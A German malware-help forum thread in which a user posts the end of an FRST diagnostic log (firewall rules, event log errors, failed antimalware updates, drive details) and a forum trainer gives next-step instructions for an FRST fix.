FirewallRules: [UDP Query User{3F5EC008-F28E-49AC-8818-20682DBFD3EC}C:\projects\unity\editor\unity.exe] => (Allow) C:\projects\unity\editor\unity.exe
FirewallRules: [TCP Query User{FF9E45DC-F3F7-43E4-AE56-62F783407453}C:\projects\netbeans 8.1\bin\netbeans64.exe] => (Block) C:\projects\netbeans 8.1\bin\netbeans64.exe
FirewallRules: [UDP Query User{DE9ED127-5905-4A02-9567-EF5C76A3DE54}C:\projects\netbeans 8.1\bin\netbeans64.exe] => (Block) C:\projects\netbeans 8.1\bin\netbeans64.exe
FirewallRules: [{95B592AC-5447-4670-B268-5FDAF46CC8AC}] => (Allow) C:\projects\PostgreSQL\pg96\bin\postgres.exe
FirewallRules: [{46C88B29-22C9-4D72-8C5C-B374A92F3647}] => (Allow) C:\projects\PostgreSQL\python2\python.exe
FirewallRules: [TCP Query User{18BD1145-CC6E-4822-985A-85C495AEE683}C:\program files\mongodb\server\3.5\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.5\bin\mongod.exe
FirewallRules: [UDP Query User{877E86F6-BBB4-4880-B2EC-6E86843C9EA3}C:\program files\mongodb\server\3.5\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.5\bin\mongod.exe
FirewallRules: [TCP Query User{0F7A9F69-0E50-48FB-BFC8-FAA8F84B3BA3}C:\projects\microsoftvscode\code.exe] => (Allow) C:\projects\microsoftvscode\code.exe
FirewallRules: [UDP Query User{4723765D-B70B-4F91-8AC6-1A6BADFD3079}C:\projects\microsoftvscode\code.exe] => (Allow) C:\projects\microsoftvscode\code.exe
FirewallRules: [TCP Query User{0D550991-D8A9-4E5A-81C4-8C9A1A134390}C:\xampp717\apache\bin\httpd.exe] => (Allow) C:\xampp717\apache\bin\httpd.exe
FirewallRules: [UDP Query User{80CA4658-F3D3-4390-ACB6-8C11821E2386}C:\xampp717\apache\bin\httpd.exe] => (Allow) C:\xampp717\apache\bin\httpd.exe
FirewallRules: [TCP Query User{8A6AEF16-B438-46B2-9CC9-691B8A3BA01B}C:\xampp717\mysql\bin\mysqld.exe] => (Allow) C:\xampp717\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{60283529-51D4-40B6-9A1D-109E644745F9}C:\xampp717\mysql\bin\mysqld.exe] => (Allow) C:\xampp717\mysql\bin\mysqld.exe
FirewallRules: [{B2022045-2C1C-49FF-A5B7-D952BD2234FC}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe
FirewallRules: [{2163AC2F-D643-4BB7-B7DE-1844A7EF24CF}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe
FirewallRules: [{5358419F-180F-408A-AC77-82856920E008}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{164B483B-2F70-4E76-8718-E72F2D135588}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{1491C1BE-A075-4227-9762-CB3E29F6BFE0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{3EFD2300-9CBB-415F-8AC6-A25533E498A5}C:\program files (x86)\codebox\bitmeter\bitmeter2.exe] => (Allow) C:\program files (x86)\codebox\bitmeter\bitmeter2.exe
FirewallRules: [UDP Query User{BAB2C80D-46C3-469E-A562-147A28D35809}C:\program files (x86)\codebox\bitmeter\bitmeter2.exe] => (Allow) C:\program files (x86)\codebox\bitmeter\bitmeter2.exe
==================== Wiederherstellungspunkte =========================
19-09-2017 23:12:40 Installed NetSpeedMonitor 2.5.4.0 x64
23-09-2017 10:06:39 Windows Update
26-09-2017 21:07:00 Windows Update
01-10-2017 10:13:51 Windows Update
==================== Fehlerhafte Geräte im Gerätemanager =============
Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (10/03/2017 10:16:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/03/2017 10:07:13 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/03/2017 09:56:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/03/2017 04:10:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/03/2017 03:23:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/02/2017 05:04:37 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/02/2017 09:37:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/01/2017 09:45:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/01/2017 09:28:40 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (10/01/2017 08:09:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Systemfehler:
=============
Error: (10/03/2017 10:27:27 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "WinHTTP-Web Proxy Auto-Discovery-Dienst" ist vom Dienst "DHCP-Client" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der Abhängigkeitsdienst oder die Abhängigkeitsgruppe konnte nicht gestartet werden.
Error: (10/03/2017 10:27:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 0.0.0.0
Aktualisierungsquelle: Microsoft Malware Protection Center
Aktualisierungsphase: Suchen
Quellpfad: hxxp://go.microsoft.com/fwlink/?LinkID=260974&clcid=0x409&NRI=true&arch=x64&eng=0.0.0.0&sig=0.0.0.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
Signaturtyp: Network Inspection System
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\NETZWERKDIENST
Aktuelle Modulversion:
Vorherige Modulversion: 0.0.0.0
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.
Error: (10/03/2017 10:27:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 1.253.171.0
Aktualisierungsquelle: Microsoft Malware Protection Center
Aktualisierungsphase: Suchen
Quellpfad: hxxp://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.14202.0&avdelta=1.253.171.0&asdelta=1.253.171.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
Signaturtyp: AntiSpyware
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\NETZWERKDIENST
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.14202.0
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.
Error: (10/03/2017 10:27:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 1.253.171.0
Aktualisierungsquelle: Microsoft Malware Protection Center
Aktualisierungsphase: Suchen
Quellpfad: hxxp://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.14202.0&avdelta=1.253.171.0&asdelta=1.253.171.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
Signaturtyp: AntiVirus
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\NETZWERKDIENST
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.14202.0
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.
Error: (10/03/2017 10:27:26 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 1.253.171.0
Aktualisierungsquelle: Microsoft Update Server
Aktualisierungsphase: Suchen
Quellpfad: Default URL
Signaturtyp: AntiVirus
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.14202.0
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.
Error: (10/03/2017 10:27:26 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Bei DCOM ist der Fehler "1084" aufgetreten, als der Dienst "wuauserv" mit den Argumenten "" gestartet wurde, um den folgenden Server zu verwenden:
{E60687F7-01A1-40AA-86AC-DB1CBF673334}
Error: (10/03/2017 10:16:42 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Bei DCOM ist der Fehler "1084" aufgetreten, als der Dienst "WSearch" mit den Argumenten "" gestartet wurde, um den folgenden Server zu verwenden:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (10/03/2017 10:15:05 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen:
AFD
CLVirtualDrive
CSC
DfsC
discache
MpFilter
NetBIOS
NetBT
nsiproxy
Psched
rdbss
spldr
tdx
VBoxDrv
VBoxUSBMon
vpcnfltr
vpcvmm
vwififlt
Wanarpv6
WfpLwf
Error: (10/03/2017 10:15:05 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "TeamViewer 12" ist vom Dienst "Ancillary Function Driver for Winsock" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Ein an das System angeschlossenes Gerät funktioniert nicht.
Error: (10/03/2017 10:15:05 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NLA (Network Location Awareness)" ist vom Dienst "Netzwerkspeicher-Schnittstellendienst" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der Abhängigkeitsdienst oder die Abhängigkeitsgruppe konnte nicht gestartet werden.
CodeIntegrity:
===================================
Date: 2015-05-16 17:00:42.325
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\BubbleSound\BubbleSound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2015-05-16 17:00:42.060
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\BubbleSound\BubbleSound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Speicherinformationen ===========================
Prozessor: AMD A8-6410 APU with AMD Radeon R5 Graphics
Prozentuale Nutzung des RAM: 17%
Installierter physikalischer RAM: 7134.36 MB
Verfügbarer physikalischer RAM: 5910.73 MB
Summe virtueller Speicher: 14266.91 MB
Verfügbarer virtueller Speicher: 13258.98 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:913.85 GB) (Free:650.29 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive d: (Recovery) (Fixed) (Total:17.37 GB) (Free:1.85 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive f: (VERBATIM) (Removable) (Total:30.03 GB) (Free:29.96 GB) FAT32
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: A7927814)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=913.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=17.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=102 MB) - (Type=0C)
========================================================
Disk: 1 (Size: 30 GB) (Disk ID: 00000000)
Partition: GPT.
==================== Ende von Addition.txt ============================
[/CODE] vielleicht noch was dazu, dass ich keine AV habe: ich hatte jahrelange Avira. bis ich gemerkt habe das ist total blind. hat nie was angezeigt außer cookies und schon gar nix abgeräumt. Malwarebytes fand und entfernte dir Dinger immer erfolgreich. Dann hatte ich eine zeitlang(1+ Jahre) Avast, aber das war auch nur unwesentlich besser als Avira. selten was angezeigt. Wenn überhaupt was gefunden, MB fand immer noch mehr. Damit hab ich Avast dann auch gebügelt. ich hab das addition.txt mal ein bisschen durchgesehen, nicht dass ich was davon verstehe, aber es gibt da anscheinend probleme mit irgendwelchen 'security updates'. ähnliches kann ich auch in unter den windows updates auf dem laptop sehen. da sind mehrere 'security essentials' updates fehlgeschlagen. wenn ich die Fehlermeldungen(code) allerdings google kriege ich nur 'misspelled' bzw. 'check your spelling' |
|
04.10.2017, 15:52
| #15 | |
| /// TB-Ausbilder | Anti Malware Programme lassen sich nicht mehr starten Servus, ok, gut gemacht... auch wenn du FRST nicht im Reparaturmodus (wie gefordert), sondern nur im abgesicherten Modus mit Eingabeaufforderung durchgeführt hast... naja, hat scheinbar dort auch funktioniert... Jetzt machen wir einen Fix mit FRST im Reparaturmodus... von mir aus auch wieder im abgesicherten Modus mit Eingabeaufforderung, wenn das klappt... überlasse ich dir.  Zitat:
Beim folgenden FRST-Fix musst du aber diese 'xxxxxx' eigenständig durch den richtigen Benutzernamen ersetzen, sonst wird der Fix nicht funktionieren.  Schritt 1
Schritt 2 Versuche nun bitte, FRST auf den Desktop im normalen Modus zu kopieren und starte FRST dort nochmal wie folgt:
Bitte poste mit deiner nächsten Antwort
|
|
| Themen zu Anti Malware Programme lassen sich nicht mehr starten |
| anti, antimalware startet nicht mehr, anwendung, einfach, fehlermeldungen, folge, folgende, forum, gen, hallo zusammen, heute, laptop, laufen, malware, malwarebytes, mikrophon schaltet sich selbsttätig aus, nicht mehr, plötzlich, programme, rootkits, schaltet, skype, starten, suche, verdacht, windows, windows defender startet nicht mehr, zusammen |
Linear-Darstellung
